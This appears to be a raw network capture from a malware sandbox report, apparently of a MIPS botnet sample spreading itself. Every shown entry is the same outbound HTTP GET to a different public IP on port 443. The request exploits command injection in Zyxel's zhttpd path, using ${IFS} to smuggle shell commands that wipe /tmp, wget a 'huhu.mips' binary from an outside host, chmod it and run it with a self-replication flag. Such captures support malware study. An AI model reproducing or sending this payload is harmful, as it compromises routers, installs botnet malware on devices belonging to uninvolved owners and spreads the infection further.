                                      Jan 19, 2024 17:29:49.111279011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8439192.168.2.1435936192.119.220.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111335993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8440192.168.2.1459488134.175.247.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111349106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8441192.168.2.144013867.162.62.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111396074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8442192.168.2.1437772184.36.123.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111413002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8443192.168.2.145675417.171.181.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111459017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8444192.168.2.1451614173.91.176.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111483097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8445192.168.2.144148018.16.253.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111519098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8446192.168.2.1446490113.13.196.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111563921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8447192.168.2.1447426216.41.240.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111601114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8448192.168.2.1439232190.144.43.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111622095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8449192.168.2.1457808201.138.147.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111649036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8450192.168.2.143972844.159.253.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111709118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8451192.168.2.144523689.57.101.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111746073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8452192.168.2.1433962154.38.109.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111785889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8453192.168.2.1434132154.196.244.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111819983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8454192.168.2.1458338104.60.56.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111840010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8455192.168.2.1450258121.45.18.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111865997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8456192.168.2.1441242106.149.223.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111915112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8457192.168.2.143834035.60.208.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111960888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8458192.168.2.1439976121.156.227.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111998081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8459192.168.2.1446824195.95.212.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112013102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8460192.168.2.144793246.230.144.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112098932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8461192.168.2.1456054205.163.98.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112123966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8462192.168.2.1446730173.112.199.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112158060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8463192.168.2.1448348159.52.182.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112184048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8464192.168.2.1460594185.226.177.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112216949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8465192.168.2.1444978163.153.86.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112270117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8466192.168.2.1439718112.10.232.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112312078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8467192.168.2.1457876108.50.179.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112373114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8468192.168.2.1456828179.131.136.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112411022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8469192.168.2.146078263.233.20.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112457037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8470192.168.2.1457250166.168.233.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112524986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8471192.168.2.1434436175.177.178.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112541914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8472192.168.2.143971045.176.117.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112586021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8473192.168.2.1458922123.34.101.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112611055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8474192.168.2.144880298.113.152.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112658024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8475192.168.2.1438732151.239.6.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112694025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8476192.168.2.1452102171.131.183.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112718105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8477192.168.2.145303246.96.71.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112761974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8478192.168.2.1435320114.9.251.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112838030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8479192.168.2.144366679.65.83.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112874985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8480192.168.2.1459942164.63.64.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112926960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8481192.168.2.1443018107.212.243.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.112956047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8482192.168.2.1460116209.235.91.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113018036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8483192.168.2.1437344159.26.218.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113027096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8484192.168.2.143286493.179.105.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113078117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8485192.168.2.1436222195.8.94.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113116980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8486192.168.2.1435544177.39.178.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113136053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8487192.168.2.144773624.186.245.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113212109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8488192.168.2.145004042.184.138.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113235950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8489192.168.2.1433972183.9.36.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113313913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8490192.168.2.1459462123.151.115.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113368988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8491192.168.2.145324658.64.128.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113404036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8492192.168.2.1437944100.37.145.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113450050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8493192.168.2.145026067.83.85.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113522053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8494192.168.2.144340082.148.128.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113527060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8495192.168.2.1449708100.23.66.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113575935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8496192.168.2.1455064154.12.81.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113595963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8497192.168.2.144840817.56.8.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113631010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8498192.168.2.143676271.242.124.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113683939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8499192.168.2.1438596171.109.215.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113729000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8500192.168.2.144114893.71.103.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113758087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8501192.168.2.145099834.230.223.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.113789082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8502192.168.2.1440262206.64.78.26443
                                      TimestampBytes transferredDirectionData
